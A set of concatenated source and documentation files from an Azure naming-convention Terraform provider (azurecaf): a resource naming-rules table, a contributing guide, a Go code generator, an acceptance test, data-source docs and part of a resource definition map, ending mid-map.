| azurerm_mssql_elasticpool| sqlep| 1| 128| false| "^[^<>*%:.?\\+\\/]{1,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_sql_failover_group| sqlfg| 1| 63| true| "^[a-z0-9][a-z0-9-]{0,61}[a-z0-9]$"|
| azurerm_sql_firewall_rule| sqlfw| 1| 128| false| "^[^<>*%:?\\+\\/]{1,127}[^<>*%:.?\\+\\/]$"|
| azurerm_log_analytics_workspace| log| 4| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{2,61}[a-zA-Z0-9]$"|
| azurerm_service_fabric_cluster| sf| 4| 23| true| "^[a-z][a-z0-9-]{2,21}[a-z0-9]$"|
| azurerm_maps_account| map| 1| 98| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,97}$"|
| azurerm_network_watcher| nw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_resource_group| rg| 1| 90| false| "^[a-zA-Z0-9-._\\(\\)]{0,89}[a-zA-Z0-9-_\\(\\)]$"|
| azurerm_network_security_group| nsg| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_network_security_group_rule| nsgr| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_network_security_rule| nsgr| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_application_security_group| asg| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_zone| dns| 1| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,61}[a-zA-Z0-9_]$"|
| azurerm_private_dns_zone| pdns| 1| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,61}[a-zA-Z0-9_]$"|
| azurerm_notification_hub| nh| 1| 260| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,259}$"|
| azurerm_notification_hub_namespace| dnsrec| 6| 50| false| "^[a-zA-Z][a-zA-Z0-9-]{4,48}[a-zA-Z0-9]$"|
| azurerm_notification_hub_authorization_rule| dnsrec| 1| 256| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,255}$"|
| azurerm_servicebus_namespace| sb| 6| 50| false| "^[a-zA-Z][a-zA-Z0-9-]{4,48}[a-zA-Z0-9]$"|
| azurerm_servicebus_namespace_authorization_rule| sbar| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_servicebus_queue| sbq| 1| 260| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,258}[a-zA-Z0-9_]$"|
| azurerm_servicebus_queue_authorization_rule| sbqar| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_servicebus_subscription| sbs| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_servicebus_subscription_rule| sbsr| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_servicebus_topic| sbt| 1| 260| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,258}[a-zA-Z0-9]$"|
| azurerm_servicebus_topic_authorization_rule| dnsrec| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_powerbi_embedded| pbi| 3| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{2,62}$"|
| azurerm_dashboard| dsb| 3| 160| false| "^[a-zA-Z0-9-]{3,160}$"|
| azurerm_signalr_service| sgnlr| 3| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,61}[a-zA-Z0-9]$"|
| azurerm_eventgrid_domain| egd| 3| 50| false| "^[a-zA-Z0-9-]{3,50}$"|
| azurerm_eventgrid_domain_topic| egdt| 3| 50| false| "^[a-zA-Z0-9-]{3,50}$"|
| azurerm_eventgrid_event_subscription| egs| 3| 64| false| "^[a-zA-Z0-9-]{3,64}$"|
| azurerm_eventgrid_topic| egt| 3| 50| false| "^[a-zA-Z0-9-]{3,50}$"|
| azurerm_relay_namespace| rln| 6| 50| false| "^[a-zA-Z][a-zA-Z0-9-]{4,48}[a-zA-Z0-9]$"|
| azurerm_relay_hybrid_connection| rlhc| 1| 260| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,258}[a-zA-Z0-9]$"|
| azurerm_app_service| app| 2| 60| false| "^[0-9A-Za-z][0-9A-Za-z-]{0,58}[0-9a-zA-Z]$"|
| azurerm_app_service_plan| plan| 1| 40| false| "^[0-9A-Za-z-]{1,40}$"|
| azurerm_app_service_environment| ase| 2| 36| false| "^[0-9A-Za-z-]{2,36}$"|
| azurerm_application_insights| appi| 1| 260| false| "^[^%&\\?/. ][^%&\\?/]{0,258}[^%&\\?/. ]$"|
| aks_node_pool_linux| npl| 1| 12| false| "^[a-z][0-9a-z]{0,11}$"|
| aks_node_pool_windows| npw| 1| 6| false| "^[a-z][0-9a-z]{0,5}$"|
| azurerm_synapse_workspace| syws| 1| 45| true| "^[0-9a-z]{1,45}$"|
| azurerm_synapse_spark_pool| sysp| 1| 15| true| "^[0-9a-zA-Z]{1,15}$"|
| azurerm_synapse_firewall_rule| syfw| 1| 128| false| "^[^<>*%:?\\+\\/]{1,127}[^<>*%:.?\\+\\/]$"|
<!-- The rows below were generated with: cat resourceDefinition_out_of_docs.json | jq -r '.[] | "| \(.name)| \(.slug)| \(.min_length)| \(.max_length)| \(.lowercase)| \(.validation_regex)|"' -->
| azurerm_private_endpoint| pe| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_service_connection| psc| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_firewall_ip_configuration| fwipconf| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_firewall_application_rule_collection| fwapp| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_firewall_nat_rule_collection| fwnatrc| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_firewall_network_rule_collection| fwnetrc| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_a_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_aaaa_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_caa_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_cname_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_mx_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_ns_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_ptr_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_txt_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_a_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_aaaa_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_cname_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_mx_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_ptr_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_srv_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_txt_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_virtual_machine_extension| vmx| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_virtual_machine_scale_set_extension| vmssx| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_network_ddos_protection_plan| ddospp| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_zone_group| pdnszg| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_proximity_placement_group| ppg| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_link_service| pls| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| databricks_cluster| dbc| 3| 30| false| "^[a-zA-Z0-9-_]{3,30}$"|
| databricks_standard_cluster| dbsc| 3| 30| false| "^[a-zA-Z0-9-_]{3,30}$"|
| databricks_high_concurrency_cluster| dbhcc| 3| 30| false| "^[a-zA-Z0-9-_]{3,30}$"|
| general| | 1| 250| false| "^[a-zA-Z0-9-_]{1,250}$"|
| general_safe| | 1| 250| true| "^[a-z]{1,250}$"|
<file_sep>/.github/CONTRIBUTING.md
# Contributing to the CAF provider
👍🎉 First off, thanks for taking the time to contribute! 🎉👍
## Code of conduct
This project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/).
For more information see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or
contact [<EMAIL>](mailto:<EMAIL>) with any additional questions or comments.
## What should I know before I get started?
The current goal of the CAF provider is to support the CAF landing zones but it can also be used to standardize the naming convention of your projects. It is important to keep in mind that many of the design decisions on the provider have been made to accommodate the needs of CAF.
To contribute to this project you are required to have at least go 1.13 installed in your system
## Adding a new resource
Please, find below the steps that should be followed to contribute:
1. Check if the resource has been implemented already
You can find a list of resources implemented in the [README.md#resource-status](../README.md) under the resource status section.
2. Create an issue for the missing resource
If there is no [issue created already](https://github.com/aztfmod/terraform-provider-azurecaf/issues) for the implementation of this resource you should [create an issue](https://docs.github.com/en/free-pro-team@latest/github/managing-your-work-on-github/creating-an-issue) requesting the implementation of the resource.
3. Check the requirements for your resource Name
You can check the requirements for your resource name in the [docs](https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/resource-name-rules) or by checking the error message returned when trying to create the resource on Azure with an invalid name. Slug value can also be checked in the CAF [docs](https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/resource-abbreviations).
4. Choose the slug for the resource
Every resource in CAF has a slug associated with it: 2 to 5 letters that identify that resource. For example, the slug for a `key vault` is `kv`, and for a storage account it is `st`. What is important here is to keep the slug short but meaningful and to avoid collisions with existing ones. Don't worry about knowing all the existing ones; if you choose one that already exists, the tests will fail. You can also check whether the resource has an example abbreviation on this page: [doc](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/resource-abbreviations)
5. Modify the `resourceDefinition.json`
You should now add your resource to the resource definitions in the `resourceDefinition.json` file; just add another resource to the list. You can use the existing resources as a template for your resource implementation.
6. Generate the definitions based on the `resourcedefinition.json` and test
You can run `make build` in case you have make installed on your system; if you don't, you can run from the repository root `go generate` followed by `go fmt ./...` and then `go test ./...`
7. Update the README.MD with coverage
For quick reference, update the [README.md#resource-status](../README.md) at the root of the provider to mention the coverage you just added:
```|azurerm_api_management_custom_domain | ✔ |```
8. Commit and submit PR
Now you should commit, remembering to put a meaningful commit message. After that, you should [make pull request](https://docs.github.com/en/free-pro-team@latest/github/collaborating-with-issues-and-pull-requests/creating-a-pull-request) remembering to link in the PR the issue that it is solving.
### The `resourceDefinition.json`
Once you have all the information and have created an issue if one doesn't exist yet you can start to fill up the resource in the `resourceDefinition.json`
Each resource in the `resourceDefinitions.json` follow the following schema:
```json
{
"name": "azurerm_snapshots", //Azurerm name of the resource
"min_length": 1, // Minumum number of chars that this resource requires
"max_length": 80, // Maximum number of chars that this resource can have
"validation_regex": "\"^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$\"", // A regex expression that will match only a valid resource name
"scope": "parent", // Where this name must be unique. global means that only one resource with this name it is allowed in azure. parent means that only one resource of this name based in the parent resource. Resource group means only one resource with this name per resource group.
"slug": "snap", // This are the letters that identify the resource type
"dashes": true, // if this resource allows you to use dashes '-'
"lowercase": false, // if this resource will ONLY allow lowercase
"regex": "\"[^0-9A-Za-z_.-]\"" // This is the 'cleaning' regex anything that is matched by this regex will be removed from the resource name that is why you normally use the negation of all the allowed chars in this regex.
}
```
## Legal
This project welcomes contributions and suggestions. Most contributions require you to agree to a
Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us
the rights to use your contribution. For details, visit https://cla.opensource.microsoft.com.
When you submit a pull request, a CLA bot will automatically determine whether you need to provide
a CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions
provided by the bot. You will only need to do this once across all repos using our CLA.
<file_sep>/gen.go
// The following directive is necessary to make the package coherent:
//go:build ignore
// +build ignore
// This program generates models_generated.go. It can be invoked by running
// go generate
package main
import (
"encoding/json"
"fmt"
"io/ioutil"
"log"
"os"
"path"
"regexp"
"sort"
"text/template"
"time"
)
// ResourceStructure resource definition structure
type ResourceStructure struct {
// Resource type name
ResourceTypeName string `json:"name"`
// Resource prefix as defined in the Azure Cloud Adoption Framework
CafPrefix string `json:"slug,omitempty"`
// MaxLength attribute define the maximum length of the name
MinLength int `json:"min_length"`
// MaxLength attribute define the maximum length of the name
MaxLength int `json:"max_length"`
// enforce lowercase
LowerCase bool `json:"lowercase,omitempty"`
// Regular expression to apply to the resource type
RegEx string `json:"regex,omitempty"`
// the Regular expression to validate the generated string
ValidationRegExp string `json:"validation_regex,omitempty"`
// can the resource include dashes
Dashes bool `json:"dashes"`
// The scope of this name where it needs to be unique
Scope string `json:"scope,omitempty"`
}
// templateData carries everything the code-generation template needs to
// render models_generated.go: the sorted resource definitions, the time of
// generation, and the slug -> resource-type-name lookup map.
type templateData struct {
    ResourceStructures []ResourceStructure
    GeneratedTime      time.Time
    SlugMap            map[string]string
}
// main generates azurecaf/models_generated.go from the resource definition
// JSON files (documented and undocumented) and the templates in ./templates.
// It is invoked via "go generate"; any failure aborts the program.
func main() {
    wd, err := os.Getwd()
    if err != nil {
        log.Panicln("No directory found")
    }
    fmt.Println()

    // Collect every template file so they can be parsed as one template set.
    files, err := ioutil.ReadDir(path.Join(wd, "templates"))
    if err != nil {
        log.Fatal(err)
    }
    fileNames := make([]string, len(files))
    for i, file := range files {
        fileNames[i] = path.Join(wd, "templates", file.Name())
    }

    parsedTemplate, err := template.New("templates").Funcs(template.FuncMap{
        // Terraform does not yet support lookahead in their regex function,
        // so lookahead groups are stripped from validation patterns.
        "cleanRegex": func(dirtyString string) string {
            var re = regexp.MustCompile(`(?m)\(\?=.{\d+,\d+}\$\)|\(\?!\.\*--\)`)
            return re.ReplaceAllString(dirtyString, "")
        },
    }).ParseFiles(fileNames...)
    if err != nil {
        log.Fatal(err)
    }

    // Merge documented and undocumented definitions, then sort by resource
    // type name so the generated file is deterministic.
    data := loadResourceDefinitions(path.Join(wd, "resourceDefinition.json"))
    data = append(data, loadResourceDefinitions(path.Join(wd, "resourceDefinition_out_of_docs.json"))...)
    sort.SliceStable(data, func(i, j int) bool {
        return data[i].ResourceTypeName < data[j].ResourceTypeName
    })

    // First resource type seen for each slug wins (data is sorted by name).
    slugMap := make(map[string]string)
    for _, res := range data {
        if _, exists := slugMap[res.CafPrefix]; !exists {
            slugMap[res.CafPrefix] = res.ResourceTypeName
        }
    }

    modelsFile, err := os.OpenFile(path.Join(wd, "azurecaf/models_generated.go"), os.O_TRUNC|os.O_CREATE|os.O_WRONLY, 0644)
    if err != nil {
        log.Fatal(err)
    }
    // Fixed: the generated file was never closed before.
    defer modelsFile.Close()

    err = parsedTemplate.ExecuteTemplate(modelsFile, "model.tmpl", templateData{
        GeneratedTime:      time.Now(),
        ResourceStructures: data,
        SlugMap:            slugMap,
    })
    if err != nil {
        log.Fatalf("execution failed: %s", err)
    }
    log.Println("File generated")
}

// loadResourceDefinitions reads one JSON definition file and unmarshals it
// into a slice of ResourceStructure; any error is fatal.
func loadResourceDefinitions(filename string) []ResourceStructure {
    content, err := ioutil.ReadFile(filename)
    if err != nil {
        log.Fatal(err)
    }
    var defs []ResourceStructure
    if err := json.Unmarshal(content, &defs); err != nil {
        log.Fatal(err)
    }
    return defs
}
<file_sep>/azurecaf/resource_naming_convention_passthrough_test.go
package azurecaf
import (
"regexp"
"testing"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/resource"
)
// TestAccCafNamingConvention_Passthrough checks the passthrough convention
// for every resource type declared in testAccResourcePassthroughConfig:
// each generated name must have the expected value, length, and prefix, and
// must satisfy the resource type's validation regex.
func TestAccCafNamingConvention_Passthrough(t *testing.T) {
    // One entry per resource declared in the test configuration.
    cases := []struct {
        id     string // suffix of the azurecaf_naming_convention address
        name   string // substring expected in the generated name
        length int    // expected length of the generated name
        prefix string // expected leading characters
        slug   string // Resources key providing the validation regex
    }{
        {"logs_inv", "logsinvalid", 11, "log", "la"},
        {"passthrough_agw", "TEST-DEV-AGW-RG", 15, "TEST", "agw"},
        {"passthrough_apim", "TESTDEVAPIMRG", 13, "TEST", "apim"},
        {"passthrough_app", "TEST-DEV-APP-RG", 15, "TEST", "app"},
        {"passthrough_appi", "TEST-DEV-APPI-RG", 16, "TEST", "appi"},
        {"passthrough_aks", "kubedemo", 8, "kube", "aks"},
        {"passthrough_aksdns", "kubedemodns", 11, "kube", "aksdns"},
        {"passthrough_aksnpl", "knplinux", 8, "knp", "aksnpl"},
        {"passthrough_aksnpw", "knpwin", 6, "knp", "aksnpw"},
        {"passthrough_ase", "TEST-DEV-ASE-RG", 15, "TEST", "ase"},
        {"passthrough_plan", "TEST-DEV-PLAN-RG", 16, "TEST", "plan"},
        {"passthrough_sql", "test-dev-sql-rg", 15, "test", "sql"},
        {"passthrough_sqldb", "TEST-DEV-SQLDB-RG", 17, "TEST", "sqldb"},
    }
    checks := make([]resource.TestCheckFunc, 0, 2*len(cases))
    for _, c := range cases {
        addr := "azurecaf_naming_convention." + c.id
        checks = append(checks,
            testAccCafNamingValidation(addr, c.name, c.length, c.prefix),
            regexMatch(addr, regexp.MustCompile(Resources[c.slug].ValidationRegExp), 1),
        )
    }
    resource.UnitTest(t, resource.TestCase{
        PreCheck:     func() { testAccPreCheck(t) },
        Providers:    testAccProviders,
        CheckDestroy: testAccCheckResourceDestroy,
        Steps: []resource.TestStep{
            {
                Config: testAccResourcePassthroughConfig,
                Check:  resource.ComposeTestCheckFunc(checks...),
            },
        },
    })
}
// testAccResourcePassthroughConfig declares one azurecaf_naming_convention
// resource per resource type exercised by
// TestAccCafNamingConvention_Passthrough. The HCL below is runtime data:
// the test assertions pin the exact names produced from it, so keep it
// byte-for-byte stable.
const testAccResourcePassthroughConfig = `
#Storage account test
resource "azurecaf_naming_convention" "logs_inv" {
convention = "passthrough"
name = "logs_invalid"
resource_type = "la"
}
# Application Gateway
resource "azurecaf_naming_convention" "passthrough_agw" {
convention = "passthrough"
name = "TEST-DEV-AGW-RG"
resource_type = "azurerm_application_gateway"
}
# API Management
resource "azurecaf_naming_convention" "passthrough_apim" {
convention = "passthrough"
name = "TEST-DEV-APIM-RG"
resource_type = "azurerm_api_management"
}
# App Service
resource "azurecaf_naming_convention" "passthrough_app" {
convention = "passthrough"
name = "TEST-DEV-APP-RG"
resource_type = "azurerm_app_service"
}
# Application Insights
resource "azurecaf_naming_convention" "passthrough_appi" {
convention = "passthrough"
name = "TEST-DEV-APPI-RG"
resource_type = "azurerm_application_insights"
}
# Azure Kubernetes Services
resource "azurecaf_naming_convention" "passthrough_aks" {
convention = "passthrough"
name = "kubedemo"
resource_type = "azurerm_kubernetes_cluster"
}
# Azure Kubernetes Services DNS Prefix
resource "azurecaf_naming_convention" "passthrough_aksdns" {
convention = "passthrough"
name = "kubedemodns"
resource_type = "aksdns"
}
# Azure Kubernetes Services Node pool Linux
resource "azurecaf_naming_convention" "passthrough_aksnpl" {
convention = "passthrough"
name = "knplinux"
resource_type = "aksnpl"
}
# Azure Kubernetes Services Node Pool Windows
resource "azurecaf_naming_convention" "passthrough_aksnpw" {
convention = "passthrough"
name = "knpwindows" #expecting 6 chars
resource_type = "aksnpw"
}
# App Service Environment
resource "azurecaf_naming_convention" "passthrough_ase" {
convention = "passthrough"
name = "TEST-DEV-ASE-RG"
resource_type = "azurerm_app_service_environment"
}
# App Service Plan
resource "azurecaf_naming_convention" "passthrough_plan" {
convention = "passthrough"
name = "TEST-DEV-PLAN-RG"
resource_type = "azurerm_app_service_plan"
}
# Azure SQL DB Server
resource "azurecaf_naming_convention" "passthrough_sql" {
convention = "passthrough"
name = "TEST-DEV-SQL-RG"
resource_type = "azurerm_sql_server"
}
# Azure SQL DB
resource "azurecaf_naming_convention" "passthrough_sqldb" {
convention = "passthrough"
name = "TEST-DEV-SQLDB-RG"
resource_type = "azurerm_sql_database"
}
`
<file_sep>/docs/data-sources/azurecaf_environment_variable.md
# azurecaf_environment_variable
The data source azurecaf_environment_variable retrieves an OS environment variable.
## Example usage
This example shows how to get the value of an environment variable.
```hcl
# Retrieve the PATH variable
data "azurecaf_environment_variable" "path" {
name = "PATH"
}
# Retrieve the PAT_TOKEN variable as sensitive data and throw an error if it does not exist.
data "azurecaf_environment_variable" "PAT" {
name = "PAT_TOKEN"
fails_if_empty = true
}
```
## Argument Reference
The following arguments are supported:
* name - (required) Name of the environment variable.
* fails_if_empty (optional) - Throws an error if the environment variable is not set (default: false).
## Attributes Reference
The following attributes are exported:
* id - The id of the environment variable
* value - Value (sensitive) of the environment variable.
<file_sep>/azurecaf/models.go
package azurecaf
import (
"math/rand"
"time"
)
const (
    // ConventionCafClassic applies the CAF recommended naming convention
    ConventionCafClassic string = "cafclassic"
    // ConventionCafRandom defines the CAF random naming convention
    ConventionCafRandom string = "cafrandom"
    // ConventionRandom applies a random naming convention based on the max length of the resource
    ConventionRandom string = "random"
    // ConventionPassThrough defines the passthrough naming convention
    // (the submitted name is used as-is)
    ConventionPassThrough string = "passthrough"
)

// "Cleaning" regexes: characters matching one of these patterns are
// removed from the submitted name.
const (
    alphanum    string = "[^0-9A-Za-z]"
    alphanumh   string = "[^0-9A-Za-z-]"
    alphanumu   string = "[^0-9A-Za-z_]"
    alphanumhu  string = "[^0-9A-Za-z_-]"
    alphanumhup string = "[^0-9A-Za-z_.-]"
    unicode     string = `[^-\w\._\(\)]`
    invappi     string = "[%&\\?/]"     // Application Insights invalid characters
    invsqldb    string = "[<>*%&:\\/?]" // SQL DB invalid characters
    //Need to find a way to filter beginning and end of string
    //alphanumstartletter string = "\\A[^a-z][^0-9A-Za-z]"
)

const (
    // suffixSeparator is placed between the name and an appended suffix
    suffixSeparator string = "-"
)
// ResourceStructure stores the CafPrefix and the MaxLength of an azure resource
type ResourceStructure struct {
// Resource type name
ResourceTypeName string `json:"name"`
// Resource prefix as defined in the Azure Cloud Adoption Framework
CafPrefix string `json:"slug,omitempty"`
// MaxLength attribute define the maximum length of the name
MinLength int `json:"min_length"`
// MaxLength attribute define the maximum length of the name
MaxLength int `json:"max_length"`
// enforce lowercase
LowerCase bool `json:"lowercase,omitempty"`
// Regular expression to apply to the resource type
RegEx string `json:"regex,omitempty"`
// the Regular expression to validate the generated string
ValidationRegExp string `json:"validatation_regex,omitempty"`
// can the resource include dashes
Dashes bool `json:"dashes"`
// The scope of this name where it needs to be unique
Scope string `json:"scope,omitempty"`
}
var (
    // alphagenerator is the character set used for the random padding;
    // letters only, so a generated string always starts with a letter.
    alphagenerator = []rune("abcdefghijklmnopqrstuvwxyz")
)

// randSeq returns a random lowercase string of the requested length, used
// to pad generated resource names. When seed is nil (or points to 0) the
// current time seeds the generator; otherwise the supplied seed makes the
// output deterministic and reproducible.
func randSeq(length int, seed *int64) string {
    // Guard zero AND negative lengths (make would panic on a negative size).
    if length <= 0 {
        return ""
    }
    // initialize random seed
    if seed == nil || *seed == 0 {
        value := time.Now().UnixNano()
        seed = &value
    }
    rand.Seed(*seed)
    b := make([]rune, length)
    for i := range b {
        // Fixed off-by-one: rand.Intn(n) already excludes n, so the previous
        // Intn(len-1) could never produce the last letter ('z').
        b[i] = alphagenerator[rand.Intn(len(alphagenerator))]
    }
    return string(b)
}
// Resources currently supported.
// Each value lists the ResourceStructure fields positionally:
// name, slug, min_length, max_length, lowercase, cleaning regex,
// validation regex, dashes allowed, uniqueness scope.
var Resources = map[string]ResourceStructure{
    "aaa": {"azure automation account", "aaa", 6, 50, false, alphanumh, "^[a-zA-Z][0-9A-Za-z-]{5,49}$", true, "resourceGroup"},
    "ac": {"azure container app", "ac", 1, 32, true, alphanumh, "^[a-z0-9][a-z0-9-]{0,30}[a-z0-9]$", true, "resourceGroup"},
    "ace": {"azure container app environment", "ace", 1, 60, false, alphanumh, "^[0-9A-Za-z][0-9A-Za-z-]{0,58}[0-9a-zA-Z]$", true, "resourceGroup"},
    "acr": {"azure container registry", "acr", 5, 50, true, alphanum, "^[0-9A-Za-z]{5,50}$", true, "resourceGroup"},
    "afw": {"azure firewall", "afw", 1, 80, false, alphanumhup, "^[a-zA-Z][0-9A-Za-z_.-]{0,79}$", true, "resourceGroup"},
    "agw": {"application gateway", "agw", 1, 80, false, alphanumhup, "^[0-9a-zA-Z][0-9A-Za-z_.-]{0,78}[0-9a-zA-Z_]$", true, "resourceGroup"},
    "aks": {"azure kubernetes service", "aks", 1, 63, false, alphanumhu, "^[0-9a-zA-Z][0-9A-Za-z_.-]{0,61}[0-9a-zA-Z]$", true, "resourceGroup"},
    "aksdns": {"aksdns prefix", "aksdns", 3, 45, false, alphanumh, "^[a-zA-Z][0-9A-Za-z-]{0,43}[0-9a-zA-Z]$", true, "resourceGroup"},
    "aksnpl": {"aks node pool for Linux", "aksnpl", 2, 12, true, alphanum, "^[a-zA-Z][0-9a-z]{0,11}$", true, "resourceGroup"},
    "aksnpw": {"aks node pool for Windows", "aksnpw", 2, 6, true, alphanum, "^[a-zA-Z][0-9a-z]{0,5}$", true, "resourceGroup"},
    "apim": {"api management", "apim", 1, 50, false, alphanum, "^[a-zA-Z][0-9A-Za-z]{0,49}$", true, "resourceGroup"},
    "app": {"web app", "app", 2, 60, false, alphanumh, "^[0-9A-Za-z][0-9A-Za-z-]{0,58}[0-9a-zA-Z]$", true, "resourceGroup"},
    "appi": {"application insights", "appi", 1, 260, false, invappi, "^[^%&\\?/. ][^%&\\?/]{0,258}[^%&\\?/. ]$", true, "resourceGroup"},
    "ase": {"app service environment", "ase", 2, 36, false, alphanumh, "^[0-9A-Za-z-]{2,36}$", true, "resourceGroup"},
    "asr": {"azure site recovery", "asr", 2, 50, false, alphanumh, "^[a-zA-Z][0-9A-Za-z-]{1,49}$", true, "resourceGroup"},
    "evh": {"event hub", "evh", 1, 50, false, alphanumh, "^[a-zA-Z][0-9A-Za-z-]{0,48}[0-9a-zA-Z]$", true, "resourceGroup"},
    "gen": {"generic", "gen", 1, 24, false, alphanum, "^[0-9a-zA-Z]{1,24}$", true, "resourceGroup"},
    "kv": {"keyvault", "kv", 3, 24, true, alphanumh, "^[a-zA-Z][0-9A-Za-z-]{0,22}[0-9a-zA-Z]$", true, "resourceGroup"},
    "la": {"loganalytics", "la", 4, 63, false, alphanumh, "^[0-9a-zA-Z][0-9A-Za-z-]{3,61}[0-9a-zA-Z]$", true, "resourceGroup"},
    "nic": {"network interface card", "nic", 1, 80, false, alphanumhup, "^[0-9a-zA-Z][0-9A-Za-z_.-]{0,78}[0-9a-zA-Z_]$", true, "resourceGroup"},
    "nsg": {"network security group", "nsg", 1, 80, false, alphanumhup, "^[0-9a-zA-Z][0-9A-Za-z_.-]{0,78}[0-9a-zA-Z_]$", true, "resourceGroup"},
    "pip": {"public ip address", "pip", 1, 80, false, alphanumhup, "^[0-9a-zA-Z][0-9A-Za-z_.-]{0,78}[0-9a-zA-Z_]$", true, "resourceGroup"},
    "plan": {"app service plan", "plan", 1, 40, false, alphanumh, "^[0-9A-Za-z-]{1,40}$", true, "resourceGroup"},
